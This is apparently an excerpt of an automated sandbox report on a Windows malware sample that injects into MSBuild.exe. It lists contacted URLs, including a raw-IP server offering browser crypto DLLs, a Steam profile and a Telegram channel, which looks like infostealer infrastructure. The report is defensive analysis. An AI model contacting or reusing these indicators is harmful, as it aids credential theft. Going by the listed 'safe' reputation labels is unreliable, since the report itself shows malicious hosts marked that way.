                    https://store.steampowered.com/points/shop/0%URL Reputationsafe
                    https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta0%URL Reputationsafe
                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
                    https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK0%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                    https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
                    https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%URL Reputationsafe
                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b0%URL Reputationsafe
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe
                    https://store.steampowered.com/about/0%URL Reputationsafe
                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF0%URL Reputationsafe
                    https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&0%URL Reputationsafe
                    http://ocsp.sectigo.com00%URL Reputationsafe
                    https://help.steampowered.com/en/0%URL Reputationsafe
                    https://store.steampowered.com/news/0%URL Reputationsafe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=0%URL Reputationsafe
                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
                    https://store.steampowered.com/stats/0%URL Reputationsafe
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp0%URL Reputationsafe
                    https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
                    https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                    https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%URL Reputationsafe
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v0%URL Reputationsafe
                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0%URL Reputationsafe
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p0%URL Reputationsafe
                    https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                    https://store.steampowered.com/legal/0%URL Reputationsafe
                    http://www.sqlite.org/copyright.html.0%URL Reputationsafe
                    https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=engl0%URL Reputationsafe
                    https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=0%URL Reputationsafe
                    https://sectigo.com/CPS00%URL Reputationsafe
                    https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg0%URL Reputationsafe
                    https://steamcommunity.com/?subsection=broadcasts0%Avira URL Cloudsafe
                    https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&amp;l=engli0%URL Reputationsafe
                    https://aka.ms/dotnet-core-applaunch?missing_runtime=true&arch=&rid=falsetrue%pLuLdluldeEpP%c0%Avira URL Cloudsafe
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV0%Avira URL Cloudsafe
                    http://upx.sf.net0%URL Reputationsafe
                    https://store.steampowered.com/0%URL Reputationsafe
                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=7tll0%Avira URL Cloudsafe
                    https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                    https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                    https://78.47.123.174/nss3.dll0%Avira URL Cloudsafe
                    https://aka.ms/dotnet-core-applaunch?missing_runtime=true&arch=&rid=falsetrue%pLuLdluldeEpP%c0%VirustotalBrowse
                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=7tll0%VirustotalBrowse
                    https://78.47.123.174/mozglue.dll0%Avira URL Cloudsafe
                    https://78.47.123.1740%Avira URL Cloudsafe
                    https://aka.ms/dotnet-core-applaunch?The0%Avira URL Cloudsafe
                    https://steamcommunity.com/profiles/76561199689717899%0%Avira URL Cloudsafe
                    https://t.me/copterwin0%Avira URL Cloudsafe
                    https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;0%Avira URL Cloudsafe
                    https://78.47.123.1744%VirustotalBrowse
                    https://steamcommunity.com/m0%Avira URL Cloudsafe
                    https://github.com/icsharpcode/SharpZipLib0%Avira URL Cloudsafe
                    https://t.me/copterwin1%VirustotalBrowse
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV0%VirustotalBrowse
                    https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;0%VirustotalBrowse
                    https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&0%Avira URL Cloudsafe
                    https://steamcommunity.com/?subsection=broadcasts0%VirustotalBrowse
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js0%Avira URL Cloudsafe
                    https://aka.ms/dotnet-core-applaunch?The1%VirustotalBrowse
                    https://steamcommunity.com/m0%VirustotalBrowse
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                    https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp0%Avira URL Cloudsafe
                    https://78.47.123.174/freebl3.dll0%Avira URL Cloudsafe
                    https://github.com/icsharpcode/SharpZipLib0%VirustotalBrowse
                    https://78.47.123.174EGDG0%Avira URL Cloudsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
                    https://community.clo0%Avira URL Cloudsafe
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js0%VirustotalBrowse
                    https://78.47.123.174/msvcp140.dll0%Avira URL Cloudsafe
                    https://steamcommunity.com/profiles/765611996897178990%Avira URL Cloudsafe
                    https://78.47.123.174/0%Avira URL Cloudsafe
                    https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&0%VirustotalBrowse
                    https://steamcommunity.com/my/wishlist/0%Avira URL Cloudsafe
                    https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp0%VirustotalBrowse
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/heade0%Avira URL Cloudsafe
                    https://steamcommunity.com/profiles/765611996897178991%VirustotalBrowse
                    https://78.47.123.174/4%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    steamcommunity.com
                    		23.199.218.33
                    		truetrueunknown
                    fp2e7a.wpc.phicdn.net
                    		192.229.221.95
                    		truefalseunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://78.47.123.174/nss3.dllfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://78.47.123.174/mozglue.dllfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://78.47.123.174/freebl3.dllfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://78.47.123.174/msvcp140.dllfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://steamcommunity.com/profiles/76561199689717899true
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://78.47.123.174/false
                    • 4%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://78.47.123.174/sqls.dllfalse
                    • 4%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://78.47.123.174/softokn3.dllfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://78.47.123.174/vcruntime140.dllfalse
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtabAFBFHD.1.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/ac/?q=AFBFHD.1.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://aka.ms/dotnet-core-applaunch?missing_runtime=true&arch=&rid=falsetrue%pLuLdluldeEpP%cSecuriteInfo.com.Win32.Malware-gen.198.6512.exefalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://steamcommunity.com/?subsection=broadcastsMSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcVMSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.MSBuild.exe, 00000001.00000002.2045233748.0000000001066000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.000000000117E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, ECGIII.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://store.steampowered.com/subscriber_agreement/MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=7tllMSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engliMSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp;MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEMSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.valvesoftware.com/legal.htmMSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exeMSBuild.exe, 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiECGIII.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackMSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://78.47.123.17476561199689717899[1].htm.1.drfalse
                    • 4%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://aka.ms/dotnet-core-applaunch?TheSecuriteInfo.com.Win32.Malware-gen.198.6512.exefalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://steamcommunity.com/profiles/76561199689717899%MSBuild.exe, 00000001.00000002.2045233748.0000000000FBD000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://t.me/copterwinSecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1764198655.0000000003F0B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1764198655.0000000003F6F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1763723745.0000000002F96000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1769696324.0000000005DC7000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94MSBuild.exe, 00000001.00000002.2045233748.0000000001066000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.000000000117E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, ECGIII.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&amp;MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&amp;l=MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.mozilla.com/en-US/blocklist/MSBuild.exe, MSBuild.exe, 00000001.00000002.2060089144.000000006D09D000.00000002.00000001.01000000.0000000C.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/mMSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://mozilla.org0/MSBuild.exe, 00000001.00000002.2045233748.0000000001062000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://github.com/icsharpcode/SharpZipLibSecuriteInfo.com.Win32.Malware-gen.198.6512.exefalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://store.steampowered.com/privacy_agreement/MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://store.steampowered.com/points/shop/MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.jsMSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=AFBFHD.1.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaMSBuild.exe, 00000001.00000002.2045233748.0000000001066000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.000000000117E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, ECGIII.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016MSBuild.exe, 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmp, FIIDBK.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPKMSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&ampMSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.ecosia.org/newtab/AFBFHD.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://78.47.123.174EGDGMSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brCBGCAF.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://store.steampowered.com/privacy_agreement/MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngMSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloMSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28bMSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.pngMSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesFIIDBK.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://store.steampowered.com/about/76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/my/wishlist/MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFCBGCAF.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://ocsp.sectigo.com0SecuriteInfo.com.Win32.Malware-gen.198.6512.exefalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/headeMSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://help.steampowered.com/en/MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/market/MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://store.steampowered.com/news/MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&amp;l=englisMSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://78.47.123.174/nss3.dll%MSBuild.exe, 00000001.00000002.2045233748.00000000010A0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=AFBFHD.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://store.steampowered.com/subscriber_agreement/MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgMSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17MSBuild.exe, 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmp, FIIDBK.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://78.47.123.174JEGIMSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://78.47.123.174/vcruntime140.dllRMSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://steamcommunity.com/discussions/MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://store.steampowered.com/stats/MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&ampMSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://store.steampowered.com/steam_refunds/MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://78.47.123.174/nss3.dllaMSBuild.exe, 00000001.00000002.2045233748.00000000010A0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gifMSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?vMSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
